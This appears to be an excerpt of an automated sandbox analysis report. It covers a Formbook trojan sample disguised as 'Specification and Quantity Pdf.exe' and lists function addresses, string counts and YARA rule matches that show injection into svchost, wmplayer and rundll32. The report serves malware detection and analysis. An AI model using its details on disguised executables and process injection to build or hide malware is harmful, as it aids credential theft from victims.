Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044CC6E0	10_2_044CC6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044D4750	10_2_044D4750
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B0770	10_2_044B0770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044AC7C0	10_2_044AC7C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456F7B0	10_2_0456F7B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B70C0	10_2_044B70C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0455F0CC	10_2_0455F0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456F0E0	10_2_0456F0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045670E9	10_2_045670E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04538158	10_2_04538158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044E516C	10_2_044E516C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0449F172	10_2_0449F172
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0457B16B	10_2_0457B16B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044A0100	10_2_044A0100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0454A118	10_2_0454A118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045681CC	10_2_045681CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044BB1B0	10_2_044BB1B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045701AA	10_2_045701AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04550274	10_2_04550274
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044CB2C0	10_2_044CB2C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045302C0	10_2_045302C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045512ED	10_2_045512ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B52A0	10_2_044B52A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456A352	10_2_0456A352
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0449D34C	10_2_0449D34C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456132D	10_2_0456132D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_045703E6	10_2_045703E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044BE3F0	10_2_044BE3F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044F739A	10_2_044F739A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B0C00	10_2_044B0C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04529C32	10_2_04529C32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456FCF2	10_2_0456FCF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044A0CF2	10_2_044A0CF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04550CB5	10_2_04550CB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B3D40	10_2_044B3D40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04561D5A	10_2_04561D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04567D73	10_2_04567D73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044BAD00	10_2_044BAD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044CFDC0	10_2_044CFDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044AADE0	10_2_044AADE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044C8DBF	10_2_044C8DBF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B0E59	10_2_044B0E59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456EE26	10_2_0456EE26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456EEDB	10_2_0456EEDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456CE93	10_2_0456CE93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044C2E90	10_2_044C2E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B9EB0	10_2_044B9EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04524F40	10_2_04524F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456FF09	10_2_0456FF09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044F2F28	10_2_044F2F28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044D0F30	10_2_044D0F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044A2FC8	10_2_044A2FC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044BCFE0	10_2_044BCFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B1F92	10_2_044B1F92
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456FFB1	10_2_0456FFB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0452EFA0	10_2_0452EFA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B2840	10_2_044B2840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044BA840	10_2_044BA840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0451D800	10_2_0451D800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B38E0	10_2_044B38E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044DE8F0	10_2_044DE8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044968B8	10_2_044968B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B9950	10_2_044B9950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044CB950	10_2_044CB950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044C6962	10_2_044C6962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044B29A0	10_2_044B29A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0457A9A6	10_2_0457A9A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04567A46	10_2_04567A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456FA49	10_2_0456FA49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04523A6C	10_2_04523A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0455DAC6	10_2_0455DAC6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044AEA80	10_2_044AEA80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044F5AA0	10_2_044F5AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0454DAAC	10_2_0454DAAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456AB40	10_2_0456AB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0456FB76	10_2_0456FB76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04566BD7	10_2_04566BD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_04525BF0	10_2_04525BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044EDBF9	10_2_044EDBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_044CFB80	10_2_044CFB80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00341030	10_2_00341030
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0034120A	10_2_0034120A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00342D90	10_2_00342D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00342D87	10_2_00342D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00349E60	10_2_00349E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00349E5B	10_2_00349E5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0035D730	10_2_0035D730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00342FB0	10_2_00342FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042CA036	10_2_042CA036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C2D02	10_2_042C2D02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042CE5CD	10_2_042CE5CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C1082	10_2_042C1082
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C8912	10_2_042C8912
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042CB232	10_2_042CB232
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C5B30	10_2_042C5B30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_042C5B32	10_2_042C5B32

Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exe	Code function: String function: 00007FF773C5C1A0 appears 63 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 03887E54 appears 89 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 038AEA12 appears 84 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 0382B970 appears 263 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 03875130 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 044F7E54 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0451EA12 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 044E5130 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0449B970 appears 265 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0452F290 appears 105 times

Source: Specification and Quantity Pdf.exe

Static PE information: invalid certificate

Source: Specification and Quantity Pdf.exe	Binary or memory string: OriginalFilename vs Specification and Quantity Pdf.exe
Source: Specification and Quantity Pdf.exe, 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
Source: Specification and Quantity Pdf.exe, 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
Source: Specification and Quantity Pdf.exe	Binary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe
Source: Specification and Quantity Pdf.exe.0.dr	Binary or memory string: OriginalFilenameSinglePerCoreLockedStacks.dllT vs Specification and Quantity Pdf.exe

Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
